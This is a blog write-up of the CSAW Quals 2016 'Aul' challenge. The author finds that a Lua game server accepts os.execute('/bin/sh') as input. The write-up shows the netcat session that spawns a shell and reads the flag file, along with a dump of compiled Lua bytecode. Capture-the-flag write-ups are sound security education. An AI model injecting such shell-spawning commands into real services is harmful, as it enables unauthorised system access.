CSAW Quals 2016 – Aul

Aul was a pwn challenge where (unusually for a pwn challenge) you were only given a link to the server; no binary and no code.

Logging into the server reveals it to be some sort of game.

let's play a game
| 0 0 0 0 0 0 0 0 |
| 0 1 0 0 0 0 4 0 |
| 0 3 2 2 4 1 4 4 |
| 0 3 2 3 2 3 4 3 |
| 4 b 2 2 4 4 3 4 |
| 3 2 4 4 1 1 2 2 |
| 3 3 c d 3 3 2 3 |
| 3 2 1 4 4 a 2 4 |

If you type something, it tells you Didn't understand. Type 'rotate', 'rotate_left', 'exit', or 'help'.. Okay, let’s ask for help:

help
LuaS�

xV(w@�,��,�,��,�,@��,��,���,�
                                 ,@��,��,����CA�$@@C$@�&�
                                                               make_boardpopulate_boardboard_tostringfallrotatecrush
                      rotate_leftreadAllhelpquitexit	run_stepgame
writelinelet's play a game

   K@J��@@��
               AF�@
setmetatableA��J��@�f&�size
             __tostringboard_tostring"
                                            .�@���A@�@@$Ab@�����@RA, @��@�F�A���AB���Ad������
@i����A�����h��@d���C�BC���
��g��F�C�ef&�sizemath
F@G@�������d���F��@�&&�mathrandom$/!K�@�@�@A������BN�@��(B��A�������݁'�BA�A@�������$B�����@A���AA���&�
size| tableinsert |concat
1D
G@�@@��������N��(���@�$B'���&�size
                                                 make_board5=EN���@�@������������_@@�OCMÂGC�@'��@��&�size��������FSG@�@@����������A������΁��N����(B�C�
                                 make_boardUg
$G@�@@��������A�A���@�N����(A����'��OA�N����(A�B�G�GB�@@����@����'��&size
       make_boardabcdik	F@�@�@��ef&�rotatemr
                                                                  F@G@����d���������@��@�&�ioopenrbread*allclosetx@@@F�@��d��$��F@A��@ǀ��d@&�stringsubreadAll
                                                                                     server.luac	writerawlen{}@@�&�quit�-F@d���@@��@�����@���A�@����@@�@A�������@����@@�@A�������@����B�@���������B@������&�
                                            	readlinestringlenexitfind	functionprintloadreturn ��%@F@@��d$�F�@�A����@��d@F�A�d���A�@@�_�@���@BƀBAB@$�������@���@���&�
     populate_board
                     make_board
writelineboard_tostring
	run_stepquitfallcrushEDidn't understand. Type 'rotate', 'rotate_left', 'exit', or 'help'.

Huh, didn’t expect that. Well, it looks like some sort of binary data. Also, the header says “LuaS”. Maybe this is a compiled Lua program?

We download the binary from the server and try to run LuaDec on it; unfortunately, whatever we pulled from the server seems corrupted. We look at the specification for compiled Lua files for a bit, and then notice that there are a lot of ‘\r\n’s where probably there should only be ‘\n’s. We try correcting this, and we also notice that the header is missing the first character from reading the “Bytecode dissected” section on this link and also correct that, but our file still doesn’t decompile.

At this point I am fooling around, and randomly type “os.execute(‘/bin/sh’)” into the program. It turns out that this actually works.

jon@jon-s76:~$ nc pwn.chal.csaw.io 8001
let's play a game
| 0 0 0 0 0 0 0 0 |
| 0 1 0 0 0 0 4 0 |
| 0 3 2 2 4 1 4 4 |
| 0 3 2 3 2 3 4 3 |
| 4 b 2 2 4 4 3 4 |
| 3 2 4 4 1 1 2 2 |
| 3 3 c d 3 3 2 3 |
| 3 2 1 4 4 a 2 4 |
os.execute("/bin/sh")
os.execute("/bin/sh")
ls
ls
flag  run.sh  scripty  server.lua  server.luac
cat flag
cat flag
flag{we_need_a_real_flag_for_this_chal}

If only getting shell on all pwns were this easy…

Advertisements

One thought on “CSAW Quals 2016 – Aul

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s